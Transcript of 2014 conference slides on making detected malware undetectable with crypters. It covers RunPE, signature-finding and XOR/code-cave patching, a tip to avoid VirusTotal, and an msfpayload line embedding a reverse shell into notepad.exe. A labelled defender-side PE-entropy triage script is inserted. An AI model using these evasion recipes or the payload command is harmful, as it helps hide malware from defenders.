AntiVirus Evasion Techniques: Use of Crypters (2k14 at MundoHackerDay)
Description: AntiVirus Evasion Techniques, Use of Crypters. Presentation (2k14) at the MundoHackerDay congress. Kevin Mitnick was also there ;)
Transcript
AntiVirus Evasion: Use of Crypters
Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14
whoami
ncd:~ apasamar$ whoami
apasamar
[email protected]
@apasamar a.k.a brajan
ncd:~ apasamar$ cat apasamar.cv
Electrical Engineer and Master in Information Security
Co-founder of INCIDE: Electronic Evidence Experts
Forensics / Expert Witness Reports
Incident Response
IT Security Auditors and Consultants
ncd:~ apasamar$ rm apasamar.cv
what is this about...
• Introduction
• AV’s how they work
• Malware types and AV detection
• Evasion techniques
• Auto-encryption, Polymorphism, Obfuscation, Compression
• Crypters
• types
• stub
• stub FUD
• Modding techniques
• Resources
introduction
• MALWARE = $$$$$$$$$
• BOTNETS, APT, RANSOMWARE
• AV Companies —> MALWARE Detection
• BAD GUYS: Undetect MALWARE
introduction
Bad guys objective: [figure]
AV howto
• AntiVirus scan binaries on the HARD DISC
• They do NOT SCAN MEMORY, only the binaries that ‘start’ the running processes
• Scan for signatures: binary sequences @ AV DataBase
• Look for malicious techniques (Heuristics): APIs, functions, XOR, etc.
• Sandbox (partial execution): look for decryption routines, etc.
AV howto
[Figure: the EXECUTABLE on DISK, the PROCESS in RAM, and the question of which of them the AV SCANS]
AV howto
• AV analysis process: [figure: the analysis stages and the attacks against them]
AV howto
• Recommended: “Abusing File Processing in Malware Detectors for Fun and Profit” (2012), Suman Jana and Vitaly Shmatikov, The University of Texas at Austin
AV howto
• Metasploit Framework (Rapid7)
• Community Edition:
• msfpayload windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe
• Pro Edition:
• Generate AV-evading Dynamic Payloads
types of malware and AV detection
• Commercial SPY programs: (white list, signed)
• e-blaster
• 007
• perfect keylogger
• …
• Newly created malware:
• LOW detection (NO known signatures)
• possible heuristic detections
types of malware and AV detection
• Existing Malware: (very well known, signature and heuristic detections)
• trojans (BiFrost, PoisonIvy,CyberGate, SpyNet, Darkcomet)
• downloaders
• passwords stealers
• reverse shells
types of malware and AV detection
How can we make malware that AV already detects undetectable?
• Crypters:
• Software that encrypts ANY MALWARE, making it undetectable to AV.
crypters
builder / stub
• Builder:
• Is responsible for creating the NEW EXEcutable, composed of the STUB and the ENCRYPTED MALWARE
• Stub:
• Its mission is to decrypt and run the ENCRYPTED MALWARE
[Figure: CRYPTER + STUB. The CRYPTER (Builder) takes the STUB and the DETECTED MALWARE (exe or dll), encrypts it (XOR, RC4, ...) and appends the ENCRYPTED MALWARE to the STUB, e.g. as a resource]
builder / stub
[Figure: STUB | splitter | CRYPTED MALWARE, and the variant STUB | splitter | CRYPTED MALWARE | KEY, where a splitter marker separates the parts]
A resource section can always be used
builder / stub
• Crypters types:
• ScanTime
• RunTime
builder / stub
• ScanTime
[Figure: STUB + CRYPTED MALWARE on the HARD DISC; the DETECTED MALWARE is written to the HARD DISC, where the AV scans it]
stub
• RunTime
[Figure: STUB + ENCRYPTED MALWARE on the HARD DISC; the DETECTED MALWARE exists only in RAM, which the AV does not scan]
stub
• STUB modules:
• Decrypt Routine
• RunPe (Dynamic Forking) Routine
stub
RunPE or Dynamic Forking
[Figure: CreateProcess (CREATE_SUSPENDED) → PROCESS 1; GetThreadContext → EBX = PEB, EAX = EP 1; BaseAddress 1 read at PEB+8; ReadFile, WriteProcessMemory → PROCESS 2 with EP 2 and BaseAddress 2; SetThreadContext; ResumeThread]
FUD
• Target: FUD Stub (Fully UnDetectable)
• From Source Code
• From Binary Code
• How?
• MODDING
modding source code
• Manually or using obfuscation tools:
• Function replacement (SPLIT, ...)
• Function/string/variable replacement and obfuscation. Use of rot13 or Hex encoding
• Encryption: RC4 and XOR are very well known by AV
• Alternatives: TEA, DES, etc.
• Alternative RunPE Routines
• Fake APIs
• TLB (Tab Library File)
• Trash code
• Techniques:
• Dsplit/AvFucker
• SignatureFucker
• Hexing
• RIT
• XOR and variants
• Tips
modding binary file
• We have to undetect the STUB; the BUILDER is only a tool used at home, not in the wild
• The first step is to FIND the AV SIGNATURES:
• Simple Signatures
• Multiple Signatures
• Heuristic Signatures
modding binary file
• Recommended: “Bypassing Anti-Virus Scanners” (2012), InterNOT Security Team
modding binary file
• What if we use a simple Encryption/Decryption routine inside the STUB?
[Figure: left, stub.exe with its EP and the Signatures in the clear; right, the modified stub.exe where the OLD EP and the Signatures are Encrypted and a NEW EP points at the Decryption Routine]
modding binary file
• ORIGINAL STUB MULTIPLE AV SCAN
modding binary file
Do NOT use VirusTotal for these scans or your STUB samples will be sent to the AV companies :(
• ENCRYPTION ROUTINE
• NEW EP
• INSERT ROUTINE
• .text SECTION
• from offset 1050
• to Import Table
modding binary file
• ENCRYPTION ROUTINE AT NEW EP
• used only to encrypt the .text section (used once)
[Figure: “Set breakpoint here, after encryption routine”]
modding binary file
• DECRYPTION AND EXECUTION AT NEW EP
modding binary file
• MODIFIED STUB MULTIPLE AV SCAN
16 AV’s KO
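A defender-side check to go with the modified stub above, added here as an example and not code from the talk: the script parses a PE and flags what the encrypt-the-.text-section trick leaves behind, a code or resource section whose bytes are near-random (encrypted code, or the payload a builder can always store in a resource section) and an entry point that no longer lies in the primary code section. The hand-rolled header parser, the 7.0 bits/byte threshold and the two constructed sample images are assumptions of this example.

```python
import math, struct
from collections import Counter

def entropy(data):
    """Shannon entropy in bits/byte: compiled code sits around 5-6.5, XOR/RC4 output near 8."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def parse_pe(pe):
    """Minimal PE32 header walk (assumption: a hand-rolled parser, not pefile): (EP, sections)."""
    nt = struct.unpack_from("<I", pe, 0x3C)[0]                   # e_lfanew -> "PE\0\0"
    assert pe[nt:nt + 4] == b"PE\0\0", "not a PE file"
    nsec, opt_size = struct.unpack_from("<H", pe, nt + 6)[0], struct.unpack_from("<H", pe, nt + 20)[0]
    entry, secs = struct.unpack_from("<I", pe, nt + 40)[0], []   # AddressOfEntryPoint
    for off in range(nt + 24 + opt_size, nt + 24 + opt_size + 40 * nsec, 40):
        name, vsize, va, rawsz, rawptr = struct.unpack_from("<8sIIII", pe, off)
        secs.append({"name": name.rstrip(b"\0").decode(), "va": va, "size": max(vsize, rawsz),
                     "data": pe[rawptr:rawptr + rawsz],
                     "exec": bool(struct.unpack_from("<I", pe, off + 36)[0] & 0x20000000)})  # MEM_EXECUTE
    return entry, secs

def triage(pe, threshold=7.0):
    """Flag the traits of the modified stub: encrypted code/resource bytes and a relocated EP."""
    entry, secs = parse_pe(pe)
    findings = [f"{s['name']}: entropy {entropy(s['data']):.2f} looks encrypted"
                for s in secs if (s["exec"] or s["name"] == ".rsrc") and entropy(s["data"]) > threshold]
    ep_sec = next((s for s in secs if s["va"] <= entry < s["va"] + s["size"]), None)
    first_code = next((s for s in secs if s["exec"]), None)      # where a normal EP lives
    if first_code and ep_sec is not first_code:
        findings.append(f"entry point {entry:#x} is in {ep_sec['name'] if ep_sec else 'no section'}, not in {first_code['name']}")
    return findings

def build_pe(sections, entry_rva):
    """Constructed, non-runnable PE32 image for testing: sections are (name, bytes, characteristics)."""
    raw, table, blobs = (0x40 + 24 + 224 + 40 * len(sections) + 511) & ~511, b"", b""
    for i, (name, data, chars) in enumerate(sections):
        table += struct.pack("<8sIIIIIIHHI", name, len(data), 0x1000 * (i + 1), len(data),
                             raw + len(blobs), 0, 0, 0, 0, chars)
        blobs += data.ljust(-(-len(data) // 512) * 512, b"\0")     # 512-byte file alignment
    hdr = (b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40) + b"PE\0\0"
           + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
           + struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry_rva).ljust(224, b"\0") + table)
    return hdr.ljust(raw, b"\0") + blobs

# Constructed samples: CLEAN has plain code with its EP in .text; CRYPTED mimics the modified stub
CODE = bytes.fromhex("558bec83ec10") * 300      # repetitive "compiled" bytes, entropy ~2.3
ENCRYPTED = bytes(range(256)) * 8                # uniform byte distribution, entropy 8.0
CLEAN = build_pe([(b".text", CODE, 0x60000020), (b".rsrc", b"\0" * 512, 0x40000040)], 0x1000)
CRYPTED = build_pe([(b".text", ENCRYPTED, 0x60000020), (b".rsrc", ENCRYPTED, 0x40000040),
                    (b".stub", CODE[:64], 0xE0000020)], 0x3000)   # NEW EP in the appended decryptor section
```

Run triage() over a folder of samples as a first pass before deeper analysis; packers and installers trip the same heuristics, so treat a hit as a reason to look, not as a verdict.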
modding binary file
• Techniques:
• Dsplit/AvFucker
• SignatureFucker
• Hexing
• RIT
• XOR and variants
• Tips
• DSplit:
[Figure: copies of the file, Header + EXE body, truncated at growing sizes: 1000 bytes, 2000 bytes, 3000 bytes, ··· N×1000 bytes]
modding binary file
• AvFucker:
[Figure: copies of the file, Header + EXE body, each with a different 1000-byte window overwritten with 0000000000, the window moving through the body ···]
modding binary file
• RIT Technique
• Find out the AV Signature
• If the Signature is located in instruction code —> break the flow
• jump to another address (a hole in a section where you can write your code)
• Execute the pending instructions
• Return/jump to the appropriate instruction
modding binary file
• XOR Technique
• Find out the AV Signature
• Apply XOR with any value, e.g. 22, to a byte
• Modify the EP or jump to your hole
• Apply XOR 22 to the modified byte
• Return/jump to the appropriate instruction
modding binary file
[Figure: hex dumps. Detected bytes (EP); XOR of the detected bytes; New EP (XORs and jump to original EP)]
modding binary file
other techniques
• Add Fake APIs
• Hex strings edit
• Move/change function calls
• Change function call type: by name / by offset
• Insert the detected dll function into the Stub Code
resources
• http://www.indetectables.net
• http://www.udtools.net
• http://www.masters-hackers.info
• http://www.level-23.biz/
• http://www.corp-51.net/
• http://www.underc0de.org
Avda. Diagonal, 640 6ª Planta
08017 Barcelona (Spain)
http://www.incide.es
http://www.twitter.com/1NC1D3
http://www.atrapadosporlosbits.com
http://www.youtube.com/incidetube
Tel./Fax. +34 932 546 277 / +34 932 546 314
ANY QUESTIONS?